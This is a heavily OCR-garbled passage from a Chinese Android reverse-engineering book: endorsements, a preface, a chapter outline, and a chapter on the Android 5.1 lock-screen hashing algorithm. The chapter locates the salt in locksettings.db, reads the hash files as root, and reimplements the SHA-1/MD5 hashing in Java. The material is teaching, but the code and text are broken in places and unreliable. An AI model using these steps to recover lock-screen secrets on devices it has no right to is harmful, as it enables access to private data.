对 本 书 的 赞 省 


行 实 际 操 作 讲 解 ， 介 绍 很 多 实用 工具 和 命令 ， 是 一 本 非 
易 。 我 仔细 看 过 这 本 


移动 应 用 多 经 是 个 不 可 忽视 的 问题 ， 本 书 结合 多 个 案例 进 
安全 逆向 工具 书籍 。 姜 维 研究 安全 逆向 这 么 久 ， 将 自 丢 多 年 的 丰富 经 验 用 书本 的 形式 展现 给 读者 也 是 非常 不 
书 ， 感 觉 真 的 很 不 错 ， 对 学 习 安 全 逆向 的 同学 很 有 帮助 ， 值 得 购买 。 
$ip, 3602-53] €] 45A... 3E SE KGECEO, ， 知 名 天 使 投 


本 书 作者 的 技术 捕 客 在 CSDN 上 有 超过 500 万 人 次 的 总 访问 量 ! 
入 多 人 会 关注 Android 安 全 技术 ? 因为 不 仅 Android 安 全 技术 越 来 越 重要 ， 而 且 要 成 为 真正 的 开发 高 手 需要 从 正 反 丙 
? >J Android А 统 如 何 运 行 


为 什么 
从 正面 学 习 Android 编 程 类 别 API， 逐 层 学 习 App 开 发 ， 从 反面 (АРКИ) 学 
详细 的 染 例 讲解 ， 也 提供 了 大 


个 方面 来 学 习 : 学 
其 他 软件 是 如 何 实现 特定 功能 的 ， 这 样 获 得 的 Android 知 识 更 加 系统 全 面 。 作 者 在 书 中 有 非常 
量 的 工具 源码 ， 是 Andtoid 开 发 人 员 送 向 学 习 研 究 的 极 好 工具 手册 ， 可 以 帮助 Andtoid 开 发 者 成 为 更 全 面 的 Andtoid 高 手 
客 帮 基金 创始 人 


的 ， 
E, CSDN4]ABA, ж 
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际 操 作 讲 解 的 同时 ， 还 特别 重视 一 些 原 理 的 介绍 ， 可 以 帮助 读者 快速 提升 Andtoid 安 全 技术 水 平 
一 一 段 钢 ， 看 雪 学 院 创 始 人 

验 ， 用 生动 的 案例 带领 读者 在 这 个 世界 中 探险 。 本 书 


522 


作者 结合 自己 在 这 个 领域 的 丰 
有 标注 的 配 图 ， 清 晰 且 直 观 ， 属 于 难得 一 见 的 用 心 之 作 


晓 波 ， 顶 将 技术 移动 安全 
爱好 者 期 待 的 好 书 ， 本 书 


安全 领域 是 一 个 冒险 的 世 


理 ， 技 术 点 循序 渐进 ， 使 用 了 大 量 带 


排 精 心 合 
验 ， 加 上 纯粹 的 技术 分 享 精神 ， 注 定 了 这 是 一 本 值得 广大 安全 


屋 原 理 ， 你 就 掌握 了 安全 的 一 切 。 
国内 知名 安全 专家 


本 书 的 作者 在 信息 安全 领域 的 多 年 经 


完整 地 向 你 诠释 一 一 掌握 了 安全 技术 的 底层 
3px), 


一 一 丰 生 强 (网 名 : 
常 多 ， 对 初学 


随 省 移动 应 用 的 普及 ， 移 动 应 用 的 安全 也 随 之 成 为 一 个 严肃 而 重要 的 问题 。 要 解决 该 问题 所 需要 学 习 的 内 容 非 
者 而 言 ， 一 本 合适 的 入 门 书籍 将 起 到 承 前 居 后 的 重要 作用 。 而 本 书 就 恰恰 是 这 样 的 一 本 书籍 ， 它 既 涵 盖 了 入 门 者 所 必须 掌握 的 基 
础 知识 ， 又 精 选 安全 领域 中 的 典型 实例 并 对 它们 开展 了 详细 讲解 。 最 后 ， 布 望 作 者 能 再 接 再 厉 ， 对 本 书 内 容 进行 持续 更 


新 。 


了 许多 
Л 


=> 
=] 
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随 着 移动 应 用 的 广泛 使 用 ， 不 可 忽视 的 一 个 问题 就 是 信 ， 


如 何 做 好 安全 。 


我 本 来 不 是 从 事 安 全 着 向 工作 的 ， 但 是 一 个 偶然 的 机 会 使 我 发 现 送 向 研究 非常 有 趣 ， 因 为 在 逆向 出 别人 的 App 那 一 刻 会 觉得 
„И Bs. 


第 一 次 逆向 是 因为 遇 到 一 个 问题 需要 去 解决 ， 记 得 当时 想 查 看 一 个 App 的 内 部 资源 信息 ， 尝 试 使 用 apktool 反 编译 程序 惊奇 
地 发 现 原来 别人 的 App 反 编译 之 后 会 有 这 么 多 东西 ， 逆 向 真 的 很 有 趣 。 而 后 在 开发 中 无 法 实现 或 者 没有 相应 的 资源 时 就 去 反 编 译 
别人 的 App， 查 看 对 应 的 代码 怎么 实现 。 后 来 就 反 编 译 那 些 有 阻碍 的 应 用 ， 慢 慢 摸 索 ， 克 服 困 难 ， 每 研究 成 功 一 个 案例 ， 便 是 对 
自身 技能 的 一 次 提高 。 从 第 一 次 使 用 apktool 工 具 ， 到 使 用 Jadx 可 视 化 工具 ， 再 到 用 IDA 工 具 调 试 ， 一 步 一 个 脚印 走 过 来 ， 经 验 逐 
渐 丰 富 ， 技 能 也 慢 慢 提升 了 。 


北向 研究 需要 一 种 逆向 思维 ， 我 没有 接受 过 专业 训练 ， 只 是 在 业余 时 间 看 相关 书籍 ， 找 几 个 样本 研究 ， 从 简单 到 难 ， 在 这 个 
过 程 中 慢 慢 学 到 很 多 技术 。 本 书 就 是 我 这 几 年 学 习 与 探索 的 总 结 。 


本 书 涉及 内 容 有 点 多 ,但 是 没有 一 章 是 多 余 的 ， 每 草 内 容 都 是 干货 。 术 书包 括 26 章 ， 分 为 四 篇 。 
基础 篇 
基础 篇 包括 第 1~7 章 ， 主 要 介绍 Andtoid 技 术 中 与 逆向 相关 的 基础 知识 ， 为 后 续 章 节 的 学 习 做 准备 。 


第 1 章 通 过 对 Android 中 锁 屏 密码 加 密 算 法 的 分 析 ， 带 领 读者 进入 安全 世界 ， 这 方面 内 容 不 算 复 杂 , 但 是 需要 阅读 Android 源 码 
来 得 到 算法 分 析 ， 其 中 一 个 知识 点 是 如 何 通过 查看 Andtoid 源 码 来 帮助 解决 开发 过 程 中 遇 到 的 问题 ， 这 是 所 有 Andtoid 开 发 人 员 必 
备 的 技能 。 通 过 找到 锁 屏 窗 码 入 口 ， 一 步 一 步 跟 踪 最 终 得 到 窗 码 加 密 算 法 ， 以 及 加 窗 之 后 的 内 容 存 放 在 哪里 。 这 是 进入 安全 逆向 


分 析 世 界 的 大 门 。 


m 


a 


第 2 章 主 要 介绍 Andtoid 中 NDK 开 发 知识 。 为 了 安全 考虑 ， 现 在 很 多 应 用 把 一 部 分 功能 做 到 了 Native 层 ， 所 以 如 果 不 知道 NDK 
开发 技巧 ， 就 无 法 进行 后 续 的 逆向 操作 。 这 一 章 从 搭建 环境 到 每 个 方法 的 使 用 ， 详 细 讲 解 了 Android 中 NDK 开 发 的 技巧 。 


第 3 章 主要 介绍 Android 中 开发 以 及 逆向 需要 用 到 的 命令 ， 每 个 命令 都 有 特定 的 案例 和 用 法 ， 这 些 命令 不 仅仅 用 于 逆向 ， 也 能 
哆 帮助 开发 人 员 提 升 开 发 效率 ， 所 以 了 解 和 党 握 这 些 命令 是 至 关 重 要 的 。 


< 


第 4~7 章 主要 剖析 Andtoid 中 编译 之 后 的 apk 包 含 的 四 类 主要 文件 格式 ， 这 部 分 内 容 可 能 有 点 枯燥 ， 但 是 至 关 重 要 ， 因 为 在 安 
全 防护 或 者 逆向 分 析 中 都 有 很 重要 的 意义 。 


防护 篇 
防护 篇 包括 第 8 一 14 章 ， 主 要 介绍 安全 防护 的 相关 内 容 ， 是 本 书 的 核心 内 容 之 一 。 
第 8 章 介绍 现在 一 些 应 用 主要 用 到 的 安全 防护 策略 ， 如 混淆 、 签 名 校 验 、 反 调试 检测 等 ， 每 个 安全 策略 都 给 出 了 详细 介绍 。 


第 9 章 介 绍 Android 开 发 中 经 常用 到 的 一 些 权 限 ， 介 绍 如 果 对 这 些 特殊 权限 操作 不 当 会 带 来 什么 样 的 安全 问题 ， 以 及 如 何 预 
防 。 
第 10 章 介绍 Andtoid 中 的 tun-as 命 令 以 及 如 何 分 析 系 统 安全 策略 ， 详 细 介 绍 了 App、shell、system 这 三 种 身份 ， 并 介绍 了 一 些 技 


巧 ， 比 如 如 何 对 应 用 进行 升级 权限 、 降 低 权 限 等 操作 。 


第 11 章 讲解 Andtoid 配 置 文件 中 的 alowBackup 属 性 引发 的 安全 问题 ， 以 及 如 何 应 对 。 本 章 用 一 个 案例 来 分 析 如 何 导 出 沙 盒 数 
据 查 看 应 用 中 的 密码 信息 ， 修 改 密码 信息 然后 再 进行 还 原 ， 全 程 无 需 toot 权 限 即 可 完成 。 


第 12 章 介绍 Andtoid 中 的 应 用 签名 机 制 ， 讲 解 应 用 的 签名 信息 是 如 何 保存 的 、 如 何 验证 的 ， 签 名 机 制 的 流程 ， 以 及 如 何 预防 


安全 问题 。 


第 13 章 介绍 在 Android 中 对 apk 进 行 加 固 的 策略 ， 以 及 如 何 对 恶意 者 分 析 apk 文 件 的 操作 进行 防护 ， 还 涉及 Android 中 的 动态 加 


载 机 制 ， 并 通过 动态 加 载 技术 实现 apk 文 件 的 解 窗 功 能 。 


第 14 章 介绍 在 Android 中 如 何 对 so 文件 加 国 ， 如 何 做 到 安全 防护 功能 。 


工具 篇 包括 第 15 一 19 草 ， 主 要 介绍 北向 分 析 需 要 用 到 的 几 个 工具 ， 本 书 从 实际 应 用 出 发 ， 详 细 介绍 每 个 工具 的 具体 用 法 ， 特 


别 是 在 使 用 的 过 程 中 遇 到 问题 时 的 处 理 方法 。 
第 15 章 介绍 逆向 工作 中 用 到 的 工具 ， 以 及 如 何 开 启 设备 的 调试 总 开关 ， 这 个 技能 在 逆向 调试 的 时 候 非 党 重要 。 


第 16 草 主要 介绍 Android 中 反 编 译 神器 apktool 和 Jadx， 详 细 介 绍 了 这 两 个 工具 如 何 使 用 ， 以 及 使 用 过 程 中 过 到 问题 时 的 处 理 方 


第 17 章 主要 介绍 Android 中 一 款 Hook 神 器 Xposed， 详 细 介 绍 这 个 工具 的 用 法 ， 以 及 遇 到 问题 时 的 处 理 方法 。 
第 18 章 主要 介绍 一 款 脱 壳 工具 ， 它 是 基于 Xposed 工 具 编写 的 ， 可 以 自动 脱 壳 。 


第 19 章 主要 介绍 Android 中 另外 一 款 Hook 和 神器 Cydia Substtate， 详 细 介 绍 了 这 个 工具 的 用 法 以 及 遇 到 问题 时 的 处 理 方法 。 


操作 篇 包括 第 20 一 26 章 ， 主 要 介绍 Andtoid 中 的 送 向 操作 技巧 ， 包 括 静 态 方 式 和 动态 方式 北向 ， 用 一 个 经 典 的 加 固 应 用 作为 


逆向 案例 分 析 了 现 阶 段 脱 沉 的 大 致 流程 ， 还 介绍 了 Andtoid 开 发 中 会 遇 到 的 系统 漏洞 ， 并 分 析 了 一 个 经 典 的 病毒 样本 。 
第 20 章 主要 介绍 如 何 利 用 静态 方式 逆向 应 用 ， 用 一 个 案例 讲解 了 静态 防护 逆向 应 用 的 流程 。 
第 21 章 主要 介绍 如 何 使 用 Eclipse 动 态 调试 smali 代 码 来 逆向 应 用 ， 用 一 个 案例 分 析 整 个 操作 流程 。 
第 22 章 主要 介绍 使 用 IDA 工 具 动 态 调试 so 源码 ， 同 时 也 介绍 了 一 些 应 对 反 调 试 检测 的 方法 。 
第 23 章 主要 介绍 如 何 逆 向 那些 经 过 加 固 的 应 用 ， 用 一 个 案例 详细 介绍 了 每 一 步 操 作 ， 最 后 总 结 了 现在 脱 这 操作 的 大 致 流程 。 


第 24 章 主要 总 结 之 前 介绍 的 着 向 知识 ， 用 一 个 经 典 案例 作为 收尾 ， 讲 解 了 现 阶 段 逆向 应 用 的 大 体 流 程 和 思路 。 


第 25 章 介绍 Andtoid 开 发 中 会 遇 到 的 系统 漏洞 一 个 是 解压 文件 漏洞 ， 一 个 是 录 屏 授权 漏洞 。 如 果 这 两 个 漏洞 不 做 修复 ， 


会 导致 应 用 沙 盒 数据 自 改 以 及 用 户 隐 私 数据 的 丢失 等 。 该 章 详 细 介 绍 了 漏洞 的 产生 原因 以 及 如 何 进 行 修复 。 

第 26 章 介绍 Android 中 一 个 非常 经 典 的 文件 加 密 病 毒 样本 ， 通 过 静态 方式 分 析 了 该 病毒 样本 的 工作 原理 ， 总 结 了 处 理 该 类 病 
毒 的 方法 。 
什么 人 适合 阅读 本 书 


阅读 本 书 需要 有 一 定 的 Android 开 发 基础 。 有 的 读者 可 能 会 觉得 第 1 章 内 容 就 有 点 深 ， 本 书 第 1 章 的 目的 在 于 把 读者 带 入 安全 
世界 ， 看 不 懂 没 关系 ， 可 以 从 第 2 章 开 始 看 下 去 ， 毕 竞 应 用 开发 领域 和 安全 北向 领域 有 很 多 不 一 样 的 地 方 。 本 书 最 大 的 特点 在 于 
非常 实用 ， 用 案例 讲解 详细 操作 步骤 ， 跟 着 每 一 步 具体 操作 ， 才 能 真正 看 明白 。 可 以 把 本 书 作 为 一 本 参考 书 ， 没 看 懂 不 要 急 ， 多 


操作 几 遍 试 试 。 
欢迎 联系 我 


本 书 用 到 了 很 多 工具 和 案例 样本 、 代 码 ， 几 乎 所 有 代码 都 给 出 了 有 具体 下 载 地 址 ， 如 果 在 操作 过 程 中 发 现下 载 失败 或 者 链接 失 
效 ， 请 联系 我 ， 可 以 加 我 的 微 信 petet_jw212， 也 可 以 关注 微 信 公众 号 “编码 美丽 ”进行 留言 ， 或 者 访问 我 的 博 
客 http://blogcsdh.net/jiangwei0910410003， 以 及 我 的 个 人 网 站 http://www.wjdiankongcn。 有 任何 问题 都 可 以 通过 这 些 渠 道 联系 
我 ， 我 将 尽力 给 出 详细 解答 。 


有 的 读者 读 完 这 本 书 之 后 ， 可 能 发 现 有 些 内 容 对 新 技术 不 再 生效 了 ， 比 如 加 固 和 脱党 技术 。 我 在 此 要 说 明 一 下 ， 这 些 技术 是 
时 刻 都 在 变 的 ， 所 谓 道 高 一 尺 ， 魔 高 一 克 ， 攻 防 技术 每 一 天 都 可 能 改变 。 所 以 本 书 选择 了 最 基本 的 入 门 技术 进行 讲解 ， 因 为 只 有 
掌握 了 这 些 技术 ， 才 能 继续 学 习 并 产生 灵感 来 应 对 日 后 变化 的 技术 。 我 认为 最 基本 的 入 门 技术 也 是 最 重要 的 技术 。 


致谢 


这 本 书 的 写作 历时 一 年 多 ， 真 心 觉得 很 不 容易 。 如 果 觉 得 本 书写 得 好 ， 就 请 推广 点 质 ; 如 果 发 现 本 书 有 错误 的 地 方 ， 还 请 批 
评 指正 。 毕 竟 第 一 次 写 书 没有 那么 完美 ， 期 待 读 者 的 指正 和 批评 。 最 后 想 感 谢 一 些 人 ， 他 们 在 我 写 书 过 程 中 给 予 了 技术 和 精神 上 
的 支持 。 非 常 感 谢 非 中 大 神 ( 《Android 软 件 安全 和 北向 分 析 》 等 书 作 者 ) 对 本 书 第 4 章 、 第 7 章 的 so 和 dex 文 件 格式 解析 技术 的 支 
持 ; 感谢 看 雪 论 坛 的 MindMac 大 神 对 第 5 章 的 atsc 文 件 格式 解析 技术 的 支持 ; 感谢 看 雪 论 坛 的 ThomasKing 大 神 对 第 14 章 加 固 技术 的 
支持 ;感谢 我 的 同学 汪 恒 和 般 传 宝 对 我 从 开始 写作 到 出 版 这 一 路 上 的 陪伴 和 鼓励 。 
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第 2 章 Android 中 NDK 开 发 
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第 1 章 “Android 中 锁 屏 密码 加 密 算法 分 析 


为 了 安全 ，Android 设 备 在 解锁 屏幕 时 会 有 窗 码 输入 ， 那 么 这 个 获 码 存 放 在 哪里 ?是 否 为 明文 存储 ?》 如 果 是 加 窖 存储 ， 那 么 
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1.1 #EBF224875 xU 
Android 中 现在 支持 的 锁 屏 密码 主要 有 两 种 : 一 种 是 手势 密码 ， 也 就 是 常见 的 九宫 格 密码 图 ; 一 种 是 输入 密码 ， 分 为 PIN 密 
码 和 复杂 字符 密码 ， 而 PIN 密码 就 是 数字 密码 ， 比 较 简 单 。 当然 现在 也 有 一 个 高 级 的 指纹 密码 ， 这 不 是 本 章 分 析 的 范围 ， 本 章 只 


分 析 手 势 密码 和 输入 密码 。 


12 ”密码 算法 分 析 


在 设置 锁 屏 密码 界面 ， 用 工具 获取 当前 的 View 类 ， 然 后 一 步 一 步 跟 入 ， 最 终 会 跟 到 一 个 锁 屏 密码 工具 类 


LockPatternUtilsjava。 每 个 版 本 可 能 实现 逻辑 不 一 样 ， 这 里 用 5.1 版 本 的 源码 进行 分 析 。 


1.2.1 输入 密码 算法 分 析 


找到 源码 之 后 ， 首 先 来 分 析 一 下 输入 密码 算法 : 


public byte[] passwordToHash(String password, int userId) { 


if (password == null) { 
return null; 


} 
stering S Loe = mulli 
byte[] hashed = null; 
(password + getSalt(userId)).getBytes(); 


try { 
"SHA-1"). 


byte[] saltedPassword - 
MessageDigest.getlInstance(algo = 


byte[] shal = 


digest (saltedPassword); 
MessageDigest.getliInstance(algo = "MD5") . 


byte[] md5 = 


digest(saltedPassworg); 
hashed = (toHex(shal) + toHex(md5)).getBytes(); 


(NoSuchAlgorithmException e) { 


) catch 
"Failed to encode string because of missing algorithm: 


Log.w(TAG, 


+ algo); 
) 


return hashed; 


可 以 看 到 有 一 个 方法 passwordToHash ， 参 数 为 用 户 输 入 的 密码 和 当前 用 户 对 应 的 jd， 一般 设备 不 会 有 多 个 用 户 ， 所 以 这 里 
的 userld 是 默认 值 0。 下 面 就 是 最 为 核心 的 加 密 算 法 了 : 原文 密码 + 设备 的 salt 值 ， 然 后 分 别 进行 MD5 和 SHA-1 操 作 ， 转 化 成 hex 
值 再 次 拼接 ， 得 到 的 就 是 最 终 保 存 到 本 地 的 加 密 密 码 内 容 。 而 这 里 最 重要 的 是 如 何 获 取 设 备 对 应 的 salt 值 ， 这 可 以 一 步 一 步 跟 踪 


代码 : 


private String getSalt(int userId) { 
long salt = getLong(LOCK PASSWORD SALT KEY, 0, userId); 
IT {galt == 0) { 
try { 
salt = SecureRandom.getInstance ("SHA1PRNG") .nextLon2g ( ) ; 
setLong(LOCK PASSWORD SALT KEY, salt, userld); 
Log.v(TAG, "Initialized lock password salt for user: " + userId); 
) catch (NoSuchAlgorithmException e) { 
throw new IllegalStateException("Couldn't get SecureRandom number", e); 


) 


return Long.toHexString(salt); 


查看 getSalt 方 法 ， 首 先 根 据 字段 key 为 lockscreen.password salt —^t75zXBXsalt[&, SIS AX EIZJO, ABEST AER 
一 个 ， 然 后 将 其 保存 到 那个 地 方 ， 最 后 将 salt 转 化 成 hex 值 即 可 。 现 在 需要 找到 这 个 地 方 ， 继 续 跟踪 代码 : 


private long getLong(String secureSettingKey, long defaultValue, int userHandle) { 
try { 
return getLockSettings().getLong(secureSettingKey, defaultValue, 
userHandle); 
) catch (RemoteException re) { 
return defaultValue; 


猜想 应 该 是 保存 到 一 个 数据 库 中 了 ， 继 续 跟踪 代码 : 


private ILockSettings getLockSettings() { 


if (mLockSettingsService == null) { 
ILockSettings service = ILockSettings.Stub.asInterface( 
ServiceManager.getService("lock settings")); 

mLockSettingsService = service; 


) 


return mLockSettingsService; 


通过 在 ServiceManager 中 获取 一 个 服务 来 进行 操作 ， 在 Android 中 ， 像 这 种 获取 服务 的 方式 最 终 实现 逻辑 都 是 在 
XXXService 类 中 ， 这 里 是 LockSettingsService.java 类 ， 找 到 这 个 类 ， 查 看 它 的 getLong 方 法 : 


QOverride 
public long getLong(String key, long defaultValue, int userId) throws 
RemoteException ( 
checkReadPermission(key, userId); 
String value = mStorage.readKeyValue(key, null, userId); 
return TextUtils.isEmpty(value) ? defaultValue : Long.parseLong(value); 


Азгана Leu, AER BXERSUREEFRURCER], ЖШШЕ: 


private final LockSettingsStorage mStorage; 


private LockPatternUtils mLockPatternUtils; 
private boolean mFirstCallToVolgd3; 


public LockSettingsService(Context context) ( 
mContext - context; 
// Open the database 


mLockPatternUtils - new LockPatternUtils(context); 
mFirstCallToVold = true; 


IntentFilter filter - new IntentFilter(); 

filter.addAction(Intent.ACTION USER ADDED); 

filter.addAction(Intent.ACTION USER STARTING); 

mContext.registerReceiverAsUser(mBroadcastReceiver, UserHandle.ALL, 
filter, null, nul1); 


mStorage - new LockSettingsStorage(context, new LockSettingsStorage. 
Са11раск() { 
@Override 
public void initialize(SQLiteDatabase db) { 

// Get the lockscreen default from a system property, if available 
boolean lockScreenDisable - SystemProperties.getBoolean( 
"ro.lockscreen.disable.default", false); 

if (lockScreenDisable) { 
mStorage.writeKeyValue (db, 
LockPatternUtils.DISABLE LOCKSCREEN KEY, "1", 0); 


果然 友 现 是 保存 到 一 个 数据 库 中 ， 继 续 查 看 LockSettingsStorage.java 类 : 
class DatabaseHelper extends SQLiteOpenHelper { 
private static final String TAG - "LockSettingsDB"; 
private static final String DATABASE NAME - "locksettings.db"; 


private static final int DATABASE VERSION = 2; 


private final Callback mCallback; 


public DatabaseHelper(Context context, Callback callback) ( 
super(context, DATABASE NAME, null, DATABASE VERSION); 


setWriteAheadLoggingEnabled(true); 
mCallback = callback; 


private void createTable(SQLiteDatabase db) ( 
db.execSQL("CREATE TABLE " + TABLE + " (" + 


" id INTEGER PRIMARY KEY AUTOINCREMENT," + 


COLUMN KEY + " ТЕХТ," + 
COLUMN USERID + " INTEGER," + 
COLUMN VALUE -+ " TEXT" + 

"34 T 


aOverride 

public void onCreate(SQLiteDatabase db) { 
createTable(db); 
mCallback.initialize(db); 


QGOverride 


public void onUpgrade(SQLiteDatabase db, int oldVersion, int 


currentVersion) í 


int upgradeVersion - oldVersion; 

if (upgradeVersion == 1) { 
// Previously migrated lock screen widget settings. Now defunct. 
upgradeVersion - 2; 

} 

if (upgradeVersion != DATABASE VERSION) { 


Log.w(TAG, "Failed to upgrade database!"); 


看 到 了 ， 数 据 库 名 字 叫 作 locksettings.db， 那 么 它 保存 在 哪里 呢 ? 继续 看 这 个 类 : 


private static final String SYSTEM DIRECTORY = "/system/"; 
private static final String LOCK PATTERN FILE - "gesture.key"; 
private static final String ОСК PASSWORD FILE = "password.key"; 


可 以 看 到 有 两 个 key 文 件 ， 它 们 丈 是 用 来 保存 加 密 之 后 的 手势 密码 和 输入 密码 的 ， 将 信息 保存 到 本 地 ， 下 次 开机 解锁 需要 读 
取 这 个 文件 内 容 进行 密码 比 对 。 看 到 一 个 目录 是 system， 所 以 数据 库 和 这 两 个 Key 文件 很 可 能 保存 到 目录 /data/system/ 下 了 ， 
为 了 再 证 实 一 下 ， 和 直接 用 find 命 令 去 根 目录 下 搜索 这 个 数据 库 文 件 也 是 可 以 的 。 最 终 确定 是 该 目录 : 


root@pisces:/ # find / -name locksettings.db 
find: /mnt/shell/emulated/lost+found: Permission denie: 
find: /proc/11158: No such file or directory 


data/suystem/locksettings.db 


irootl?^pisces-/ 


这 里 可 能 会 提示 找 不 到 find 命 令 ， 这 时 需要 安装 busybox 工 具 ， 才 能 使 用 这 个 命令 。 


找到 这 个 数据 库 文件 束 好 办 了 ， 和 直接 取 


出 来 ， 然 后 用 SQLite 工 具 进 行 查看 即 可 ， 当 然 也 可 以 直接 在 手机 中 查看 。 为 了 方便 还 是 取出 来 看 ， 如 图 1-1 所 示 。 


zr ds locksettings 
android metadata 
E] locksettings 


= Click here to define a filter 

Ú 1 3 migrated D true 

E 2 4 migrated user specific Ü true 

国 3 б lockscreen.enabledtrustagents 0 

4 361) lockscreen.password salt 0 -9167742676506383495 
国 5| ББ елесте НЕА olo | 
[| б 1283 lock_pattern_autolock | 0/0 

B 7 1285 lockscreen.password_type_alternate 00 

B 8 Ee ea al a 0 0 

9 1287 lockscreen.password type 0|393216 

B 10 1288 lockscreen.passwordhistory | 0 

[| 11 1328 lock_pattern_visible_pattern 011 

国 12| 1600 lockscreen.lockoutattemptdeadline | 0/0 


91-1 数据库 信 息 


这 里 看 到 了 表格 字段 ， 并 且 获 取 到 这 个 值 了 ， 那 么 下 面 束 要 用 这 个 值 来 验证 上 面 的 分 析 是 否 正 确 。 首 先 给 设备 设置 一 个 简单 
的 输入 密码 ， 这 里 直接 输入 简单 的 “1234”， 然 后 会 在 /data/system 目 录 下 生成 一 个 密码 加 密 key 文 
件 /data/system/password.key， 将 该 文件 导出 来 ， 如 图 1-2 所 示 。 


LockPatternUtils.java LockSettingsService.java password.key LockSettingsStorage.java 


aDABF2A43CA45DC81418302DCBSD3FA23DDOD21BAFAEC2DD /FAGD /3FCECB94655D2105A8B 
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下 面 束 用 简单 的 Java 代 码 手 动 实现 这 个 算法 ， 看 看 分 析 是 否 正确 。 加 密 算法 不 用 自己 写 ， 直 接 从 上 面 的 源码 中 拷贝 出 来 束 可 
以 了 。 代 码 如 下 : 


/** 
* 输入 密码 加 密 算法 
х @рагаш password 
х (üreturn 
кү 
public static byte[] passwordToHash(String password) { 
if (password == null) { 
return null; 
} 
byte[] hashed = null; 
Dry 4 
byte[] saltedPassword = (password + SALT).getBytes(); 
byte[] shal = MessageDigest getInstance ("SHA-1").digest (saltedPassword); 
byte[] md5 = MessageDigest.getInstance("MD5").digest (saltedPassword); 
hashed = (toHex(shal) + toHex(md5)).getBytes(); 
) catch (Exception e) { 


) 


return hashed; 


private static String toHex(byte[] ary) ( 


final String hex - "0123456789ABCDEF"; 
String ret - ""; 
for (int 1 = 0; i « ary.length; 1++) { 


ret += hex.charAt((ary[i] >> 4) & Oxf); 
ret += hex.charAt(ary[i] & Oxf); 


) 


return ret; 


这 里 的 salt 值 是 我 们 从 数据 库 中 得 到 的 ， 不 过 要 记得 进行 hex 转 化 : 


/** 


х 设备 的 salt 值 ， 可 以 利用 反射 获取 ， 也 可 以 去 /data/system/locksettings.db 数据 库 中 查看 
* 需要 注意 的 是 数据 库 中 保存 的 是 long 类 型 ， 这 里 需要 进行 hex 转化 


my 
private final static String SALT - Long.toHexString(-91677426765063834951); 


然后 用 “1234” 原 文 密码 去 生成 加 密 之 后 的 信息 : 


System.out.println("passwordinfo:"+new String(passwordToHash("1234"))); 


运行 结果 如 图 1-3 所 示 。 


[E] Console 2i |$] Problems  1одаСаї 国 Signing and Keys 

zterminated > Main (5) [Java Application] CAProgram FilesMavalre1.8.0 9A\binyavaw.exe (2017:E7H9H F#3:54:16) 
pattern:FFECIE/0D113BOB96C7EGCB2B33460E24407A96E 
passwordinfo:JEDABF2A43CA5DC81410302DCB8D3FA23DDOD21BAFAEC2DD7FA6D73FCECB94655D2105AOGB 
salt:80c5a29bc6a5eb79 


BLUES. EmBJpassword.keyPjzrse2e k, ИР Т EENAA EEE. SIDES TTG f АУА 
算法 ， 总 结 一 点 融 是 : MD5 (输入 明文 密码 + 设备 的 salt) .Hex+SHA1 (输入 明文 密码 + 设备 的 salt) Нех АУД 
容 。 而 这 里 最 重要 的 是 如 何 获 取 设 备 的 salt 值 ， 可 以 用 反射 机 制 进行 获取 ， 新 建 一 个 简单 的 Android 项 目 : 


tryi 


Class«?» clazzi = Class.forName("com.android.internal.widget. 
LockPatternUtils"); 
Object lockUtils = clazzil.getConstructor(Context.class).newlInstance(this); 


Class«?» lockUtilsClazz - lockUtils.getClass(); 

Method getSaltM - lockUtilsClazz.getDeclaredMethod("getSalt", int.class); 
getSaltM.setAccessible(true); 

Object saltObj = getSaltM.invoke(lockUtils, 0); 


Log.i("jw", "salt:"«saltObj); 
)catch (Exception е){ 
Log.i("jw", "err:"-«Log.getStackTraceString(e)); 


这 样 束 不 用 去 查看 数据 库 获 取 salt 值 了 ， 方便 快捷 ， 打 印 的 日 志 信 息 如 下 : 


D:*»adb logcat -s jv 
—— beginning of sustem 


— beginning of main 
| АГ < 2527»: salt:88c5a29bc6a5eb79 


这 是 数据 库 中 的 long 类 型 值 转化 成 hex 之 后 的 值 。 


1.2.22 手势 密码 算法 分 析 


下 面 来 分 析 手 势 密码 ， 代 码 依然 在 LockPatternUtilsjava 中 : 


public static byte[] patternToHash(List«LockPatternView.Cell» pattern) { 
ll (pattern == null) 4 
return null; 


} 

final int patternSize = pattern.size(); 

byte[] res = new byte[patternSize]; 

for (int 1 = 0; i < patternSize; 1++) { 
LockPatternView.Cell cell = pattern.get (i); 
res[i] = (byte) (cell.getRow() * 3 + cell.getColumn()); 

} 

try { 


MessageDigest md = MessageDigest.getInstance ("SHA-1"); 
byte[] hash = md.digest (res); 
return hash; 
} catch (NoSuchAlgorithmException nsa) { 
return res; 


这 个 算法 比较 简单 ， 束 是 九 官 格 图 案 转 化 成 字 节 数组 ， 然 后 用 SHA1 加 密 即 可 。 关 于 九宫 格 不 再 多 说 了 ， 从 0 开始 顺 时 针 计 
数 到 8， 类 似 图 1-4 所 示 。 


1 
34 
7 


看 一 下 代码 ， 有 行 和 列 之 分 。 比 如 ! 形 状 的 手势 密码 应 该 是 00 03 06 07 08， 这 样 组 成 五 个 字 节 。 这 里 为 了 验证 手势 密码 是 
否 正确 ， 设 置 一 个 简单 的 手势 密码 ， 如 图 1-5 所 示 。 


图 1-4 Zug 


图 1-5 ”简单 的 手势 密码 


然后 在 /data/system 目 录 下 生成 一 个 密码 文件 /data/system/gesture.key， 取 出 来 用 二 进 制 工具 查看 ， 不 然 可 能 看 到 的 是 
乱码 ， 这 里 用 的 是 010Editor 工 具 查 看 ， 如 图 1-6 所 示 。 


| gesture. key | 


0000h: FF EC 1E 70 01 13 BO BS &C 7E 6C B2 B3 34 60 EZ yl.pN.^31-15:54*-à 
0010h: 44 07 AS 6E D .En 


图 1-6 ”手势 密码 加 密 内 容 


为 了 最 大 化 地 还 原 算法 ， 依 然 把 源码 拷贝 出 来 ， 然 后 定义 一 个 手势 九宫 格 类 ， 构 造 出 这 个 手势 的 点 数据 : 


/** 


* 手势 密码 加 密 算法 
* @param pattern 
х @return 


af 
public static byte[] patternToHash(List«LockPatternView.Cell» pattern) { 
if (pattern == null) { 
return null; 
} 
int patternSize = pattern.size(); 
byte[] res = new byte[patternSize]; 
for (int 1 = 0; 1 < patternSize; i++) { 
LockPatternView.Cell cell = pattern.get (i); 
res[1] = (byte) (cell.row * 3 + cell.column); 
J 
try ( 
MessageDigest md = MessageDigest.getInstance("SHA-1"); 
byte[] hash = md.digest (res); 
return hash; 
} catch (Exception nsa) { 
} 
return null; 
} 


这 是 源码 的 加 密 算法 ， 下 面 再 构造 出 手势 点 数据 : 


// 手势 密码 模拟 

